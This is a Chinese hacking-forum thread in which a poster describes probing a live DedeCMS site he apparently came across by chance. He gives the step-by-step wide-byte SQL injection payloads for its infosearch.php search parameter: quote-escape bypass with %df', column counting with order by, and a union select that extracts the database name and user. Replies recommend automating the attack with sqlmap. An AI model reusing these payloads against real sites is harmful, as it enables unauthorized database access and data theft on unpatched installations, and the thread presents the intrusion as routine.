搜索
查看: 472|回复: 3

网站入侵检测一次简单的宽字节注入流程

[复制链接]

26

主题

29

帖子

147

积分

我是新手

Rank: 1

积分
147
发表于 2016-11-11 14:11:20 | 显示全部楼层 |阅读模式

"随便逛时"碰到dede.记得这个页面有注入

/plus/infosearch.php?action=1111&q=

前人有写了一个exp

我试过前辈的exp,发现exp并不是很完善.

不过既然是解析拿就自己来.

加'



正常

判断

GPC、addslashes函数,或者icov等.

单引号被转义了,利用宽字节注入!具体我不说了,百度一大推

根据经验随便加个中文后面再跟个单引号



加 -----> %df'



判断: 存在宽字节注入

两条sql语句接受参数带入执行了,报了两次错,

看到%号,搜索注入,要注视掉

构造sql_exp---> %%df' #



报错,根据get数据库文件的思路,#号可以用%23

---> %%df%27 %23



成功,判断字段 order by 50

---> %%df%27 order by 50 %23



错误, order by 1

---> %%df%27 order by 1 %23



判断 可以 order by ,order by 5

-->%%df%27 order by 5 %23



判断:

这个页面第一条sql语句所查询的表的字段 小于5 ,第二条大于5.

一番测试后,发现 第一条 的字段为1 ,第二条的字段为 6,用第二条,显位是3,5

联合查询

----> %%df%27 union select 1,2,database(),4,user(),6 %23



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x

0

主题

5

帖子

25

积分

我是新手

Rank: 1

积分
25
发表于 2016-11-15 16:28:36 | 显示全部楼层
sqlmap加载宽字节脚本可以直接跑

1

主题

15

帖子

352

积分

我是新手

Rank: 1

积分
352
发表于 2016-11-16 15:08:17 | 显示全部楼层
或许后面的报数据办法更好!

0

主题

10

帖子

10

积分

我是新手

Rank: 1

积分
10
发表于 2016-11-30 20:34:43 | 显示全部楼层
什么版本的  新0day?
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表